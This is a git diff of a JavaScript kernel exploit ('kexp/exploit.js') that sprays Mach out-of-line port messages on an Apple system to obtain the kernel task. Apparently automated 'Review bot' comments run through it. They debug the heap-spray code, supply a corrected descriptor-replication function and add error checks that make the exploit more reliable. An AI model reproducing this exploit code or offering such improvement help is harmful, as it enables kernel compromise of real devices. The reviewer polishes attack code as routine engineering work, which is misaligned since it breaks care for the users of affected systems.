Diffstat (limited to 'src/js/kexp')
-rwxr-xr-x[-rw-r--r--]src/js/kexp/exploit.js79
1 files changed, 65 insertions, 14 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index c28e59c..e0ef574 100644..100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
var req_init_port_set_address = 0x0
var req_init_port_set_count = 0x4
+var task_self = 0;
var kslide = 0;
var fakeportData = 0;
@@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) {
function copyinPort(kport, cnt) {
var err = malloc(4);
var ret = 0;
- var self = mach_task_self();
+ var self = task_self;
var service = MACH_PORT_NULL;
var client = malloc(4);
var it = malloc(4);
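Review bot: `var self = task_self;` now reads a module global that this diff initialises to 0 and, as far as the visible hunks show, only assigns inside get_kernel_task; if copyinPort is reached before that (or from any other entry point) `self` is MACH_PORT_NULL and every Mach call made with it fails. The caching is reasonable, but a one-line guard keeps the helper self-contained: `if (task_self == 0) task_self = mach_task_self();` at the top of copyinPort, or alternatively initialise the global eagerly at its declaration. copyinPort's body continues past this hunk.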
@@ -180,23 +181,43 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports\n");
+ printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
- mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
+ mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
}
var mp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
- printf("%x\n", read_u32(mp));
- mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+ var rmp = read_u32(mp);
+ mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
- send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ send_ports(rmp, read_u32(kp), 2, number_port_descs);
return mp;
}
+function fast_log2(n) {
+ var i = 0;
+ while (n >>= 1) {
+ i++;
+ }
+
+ return i;
+}
+
+function fast_array_mul(arr, n) {
+ var tmp_arr = arr;
+ var done = 0;
+ for (var i = 0; i < fast_log2(n) + 2; i++) {
+ tmp_arr = tmp_arr.concat(tmp_arr);
+ done = (1 << i);
+ }
+
+ return tmp_arr;
+}
+
function send_ports(target, payload, num, number_port_descs) {
var init_port_set = malloc(num * 4);
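Review bot: fast_array_mul does not multiply by n: it doubles the array floor(log2(n))+2 times, so the result holds between 2n and 4n copies of the 12-byte descriptor template rather than exactly n, and `done` is assigned on every iteration but never read. The caller compensates by over-allocating the message buffer eightfold, and for number_port_descs == 0 the 48 bytes still produced exceed the 0x1c-byte header-only buffer; the message-size argument to mach_msg also still assumes exactly n descriptors. Producing exactly n copies by doubling and then trimming removes the oversize factor and the special case, and leaves fast_log2 unused so it can go.
```javascript
function fast_array_mul(arr, n) {
    // Return arr repeated exactly n times: double until large enough, then trim.
    var want = arr.length * n;
    var out = arr;
    while (out.length < want) {
        out = out.concat(out);
    }
    return out.slice(0, want);
}
```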
@@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(init_port_set + (i << 2), payload);
}
- var buf = malloc(0x1c + (number_port_descs * 0xc));
+ var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+
write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+ var new_buf_ = new Array();
+ var tmp = u32_to_u8x4(init_port_set);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ tmp = u32_to_u8x4(num);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ new_buf_.push(0);
+ new_buf_.push(0);
+ new_buf_.push(19);
+ new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+
+ var new_buf = fast_array_mul(new_buf_, number_port_descs);
+
+ fast_write_buf(buf + req_init_port_set, new_buf);
+
+ /*
for (var i = 0; i < number_port_descs; i++) {
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
- }
+ }*/
write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
write_u32(buf + req_head_msgh_request_port, target);
write_u32(buf + req_head_msgh_reply_port, 0);
write_u32(buf + req_head_msgh_id, 1337);
- return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+
+ free(buf);
+
+ printf("%d %s\n", ret, mach_error_string(ret));
+
+ return ret;
}
function get_kernel_task() {
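Review bot: `init_port_set`, allocated at the top of send_ports just above this hunk, is never released even though the new code now does `free(buf);` after the send; mach_msg has copied the message and its out-of-line port array in by the time it returns, so `free(init_port_set);` belongs right next to `free(buf);` (assuming the framework's free pairs with its malloc the way it does for buf). The old descriptor loop kept as a `/* ... */` block should be deleted rather than left commented out, since the fast_write_buf path fully replaces it. The bare `19` pushed as the descriptor disposition is the same value the msgh_bits comment spells out, which in the Mach headers is MACH_MSG_TYPE_COPY_SEND; a named constant such as `var MACH_MSG_TYPE_COPY_SEND = 19;` next to MACH_MSG_OOL_PORTS_DESCRIPTOR would make the 12-byte layout readable.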
@@ -229,11 +278,13 @@ function get_kernel_task() {
sanity_port = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port);
- mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
+ task_self = mach_task_self();
+
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);
+ mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
limits = malloc(4);
write_u32(limits, 1000);
- mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
+ mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
printf("starting exploit\n");
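Review bot: The return values of mach_port_allocate, mach_port_insert_right and mach_port_set_attributes are all discarded in this hunk, so a failed allocation leaves `read_u32(sanity_port)` reading uninitialised memory and the exploit continues with a bogus port name. Check each one and bail out, mirroring the error reporting send_ports now does: `var kr = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port); if (kr != 0) { printf("mach_port_allocate: %s\n", mach_error_string(kr)); return; }` (adjust the bail-out to whatever failure convention get_kernel_task's callers expect). get_kernel_task starts above this hunk and its body continues past it.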